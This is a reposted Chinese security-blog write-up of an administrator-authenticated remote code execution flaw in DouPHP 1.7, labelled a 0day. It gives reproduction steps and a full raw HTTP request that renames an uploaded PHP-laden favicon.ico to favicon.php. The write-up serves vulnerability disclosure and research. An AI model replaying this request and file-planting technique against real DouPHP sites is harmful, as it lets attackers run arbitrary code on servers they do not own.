DouPHP 1.7 Release 20220822 远程代码执行漏洞

admin 2024年8月19日21:10:00评论76 views字数 1182阅读3分56秒阅读模式
02文章正文

漏洞描述

DouPHP是一个开源的PHP开发框架,广泛应用于快速开发Web应用。其设计目标是简单、快速、灵活、安全。

DouPHP 1.7Release20220822版本中存在一个远程代码执行(RCE)漏洞。拥有管理员权限的攻击者可以通过该漏洞在服务器上执行任意命令。漏洞通过上传恶意文件、修改文件扩展名以及通过构造特定的数据包来执行PHP代码。

漏洞复现

1、 登录管理员后台。

2、 上传恶意文件

DouPHP 1.7 Release 20220822 远程代码执行漏洞

DouPHP 1.7 Release 20220822 远程代码执行漏洞

3、 上传一个包含php代码的ico图标

DouPHP 1.7 Release 20220822 远程代码执行漏洞

上传成功:

DouPHP 1.7 Release 20220822 远程代码执行漏洞

4、把上传的favicon.ico文件修改为favicon.php,从而执行php代码。

DouPHP 1.7 Release 20220822 远程代码执行漏洞

DouPHP 1.7 Release 20220822 远程代码执行漏洞

DouPHP 1.7 Release 20220822 远程代码执行漏洞

抓取数据包,进行修改文件名操作

DouPHP 1.7 Release 20220822 远程代码执行漏洞

  1. POST /cache/custom_admin_path.candel.php HTTP/1.1
  2. Host: douphp:84
  3. User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64; rv:128.0)Gecko/20100101Firefox/128.0
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
  5. Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  6. Accept-Encoding: gzip, deflate
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length:109
  9. Origin: http://douphp:84
  10. Connection: close
  11. Referer: http://douphp:84/admin/tool.php?rec=custom_admin_path
  12. Cookie: PHPSESSID=bl1s095coldq9mc4a2d9ivrgki
  13. Upgrade-Insecure-Requests:1
  14. Priority: u=0, i
  15. new_path=favicon.php&old_path=favicon.ico&ryjwoi=278144&root_url=http%3A%2F%2Fdouphp%3A84%2F&submit=%E6%8F%90%E4%BA%A4

DouPHP 1.7 Release 20220822 远程代码执行漏洞

访问对应的恶意文件路径:http://{你的url地址}/favicon.php

DouPHP 1.7 Release 20220822 远程代码执行漏洞

attachment/2024/08/d773107c-726b-4f24-a0b7-4aff6cf98e48-weAxeCnx.docx

DouPHP 1.7 Release 20220822 远程代码执行漏洞
 

原文始发于微信公众号(安全之眼SecEye):【0day】DouPHP 1.7 Release 20220822 远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月19日21:10:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DouPHP 1.7 Release 20220822 远程代码执行漏洞https://cn-sec.com/archives/3080934.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息